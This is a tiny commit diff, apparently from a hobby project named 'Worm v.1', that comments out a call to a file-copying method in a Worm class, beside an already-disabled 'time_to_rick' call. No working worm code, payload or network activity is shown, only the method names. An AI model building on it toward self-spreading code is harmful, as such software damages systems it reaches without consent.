Debug push for copyfiles

--- a/Worm v.1
+++ b/Worm v.1
@@ -208,7 +208,7 @@ class Worm:
         except:
             logging.warning("something went wrong")
         
-        self.copy_existing_files()
+        #self.copy_existing_files()
         #self.time_to_rick()
         
         
